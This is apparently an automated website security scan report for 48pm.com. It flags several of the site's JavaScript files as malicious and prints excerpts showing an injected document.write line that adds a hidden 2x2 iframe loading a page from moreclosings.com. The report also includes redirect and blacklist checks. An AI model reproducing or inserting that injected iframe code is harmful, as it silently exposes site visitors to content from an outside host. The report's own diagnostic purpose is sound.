Scanned pages/files
Request | Server response | Status |
http://www.48pm.com/ | 200 OK Content-Length: 32756 Content-Type: text/html | clean |
http://www.48pm.com/js/loadevent.js | 200 OK Content-Length: 396 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function addLoadEvent(func) { var oldonload = window.onload; if (typeof window.onload != 'function') { window.onload = func; } else { window.onload = function() { if (oldonload) { oldonload(); } func(); } } } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://moreclosings.com/showthread.php?sid=276998 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998> | ||
http://www.48pm.com/js/styleswitcher.js | 200 OK Content-Length: 8487 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getAllSheets() { if( !window.ScriptEngine && navigator.__ice_version ) { return document.styleSheets; } if( document.getElementsByTagName ) { var Lt = document.getElementsByTagName('link'), St = document.getElementsByTagName('style'); } else if( document.styleSheets && document.all ) { var Lt = document.all.tags('LINK'), St = document.all.tags('STYLE'); } else { return []; } for( var x = 0, os = []; Lt[x]; x++ ) { var rel = Lt[x].rel ? Lt[x].rel $('more_'+i).style.display = ''; $('link_'+i).innerHTML = 'less <img src=\"http://www.originalsignal.com/images/less.gif\" alt=\"fold\" />'; } } } } function setStyle() { if (getCookie('fontsize') == 'big') { changeStyle('big'); } } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://moreclosings.com/showthread.php?sid=276998 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998> | ||
http://www.48pm.com/js/prototype.js | 200 OK Content-Length: 55314 Content-Type: application/x-javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://moreclosings.com/showthread.php?sid=276998 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998> | ||
http://www.48pm.com/js/scriptaculous.js | 200 OK Content-Length: 2412 Content-Type: application/x-javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://moreclosings.com/showthread.php?sid=276998 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998> | ||
http://www.48pm.com/js/default.js | 200 OK Content-Length: 3942 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function setCookie(cookieName,cookieValue,nDays) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=365; expire.setTime(today.getTime() + 3600000*24*nDays); document.cookie = cookieName+"="+escape(cookieValue) + ";expires="+expire.toGMTString(); } function getCookie(name) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ((!start) && (name != do var wint = (screen.height - 450) / 2; var thevars = 'resizable=yes,scrollbars=yes,status=0,menubar=no,width=460,height=450,top=' + wint + ',left=' + winl; newwindow=window.open(url,'popup',thevars); if (window.focus) {newwindow.focus()} return false; } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://moreclosings.com/showthread.php?sid=276998 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998> | ||
http://www.48pm.com/js/lightbox.js | 200 OK Content-Length: 6080 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var detect = navigator.userAgent.toLowerCase(); var OS,browser,version,total,thestring; function getBrowserInfo() { if (checkIt('konqueror')) { browser = "Konqueror"; OS = "Linux"; } else if (checkIt('safari')) browser = "Safari" else if (checkIt('omniweb')) browser = "OmniWeb" else if (checkIt('opera')) browser = "Opera" else if (checkIt('webtv')) browser = "WebTV"; else if (checkIt('icab')) browser = "iCab" else if (checkIt('m lb = document.createElement('div'); lb.id = 'lightbox'; lb.className = 'loading'; lb.innerHTML = '<div id="lbLoadMessage">' + '<p>Loading</p>' + '</div>'; bod.appendChild(overlay); bod.appendChild(lb); } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://moreclosings.com/showthread.php?sid=276998 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998> | ||
http://www.48pm.com/js/boxover2.js | 200 OK Content-Length: 11099 Content-Type: application/x-javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://moreclosings.com/showthread.php?sid=276998 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998> | ||
http://www.48pm.com/js/menu.js | 200 OK Content-Length: 1145 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function makeActive(tab) { el = document.getElementById(tab); el.style.backgroundImage= 'url(http://www.originalsignal.com/images/bg_tab6.gif)'; el.style.height = '21px'; el.style.marginTop = '-4px'; el.style.paddingTop = '7px'; } function hideActive(tab) { el = document.getElementById(tab); el.style.backgroundImage= ''; } function showSub(id,subid) { el = document.getElementById(subid); el.style.visi tid.style.marginTop = '-4px'; tid.style.paddingTop = '7px'; } function hideSub(id,subid) { el = document.getElementById(subid); el.style.visibility = 'hidden'; tid = document.getElementById(id); tid.style.backgroundImage= ''; } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://moreclosings.com/showthread.php?sid=276998 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998> | ||
http://www.48pm.com/js/fader.js | 200 OK Content-Length: 877 Content-Type: application/x-javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://moreclosings.com/showthread.php?sid=276998 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998> | ||
http://www.48pm.com/js/beansmenu.js | 200 OK Content-Length: 773 Content-Type: application/x-javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://moreclosings.com/showthread.php?sid=276998 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998> | ||
http://www.48pm.com/js/beanspopbox.js | 200 OK Content-Length: 4210 Content-Type: application/x-javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://moreclosings.com/showthread.php?sid=276998 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998> | ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19470 Content-Type: text/javascript | clean |
http://www.48pm.com/mobile | 404 Not Found Content-Length: 310 Content-Type: text/html | clean |
http://www.48pm.com/test404page.js | 404 Not Found Content-Length: 318 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 48pm.com
Result:
GET / HTTP/1.1
Host: 48pm.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: 48pm.com
Referer: http://www.google.com/search?q=48pm.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 48pm.com
Referer: http://www.google.com/search?q=48pm.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=48pm.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://48pm.com/
Result: 48pm.com is not infected or malware details are not published yet.
Result: 48pm.com is not infected or malware details are not published yet.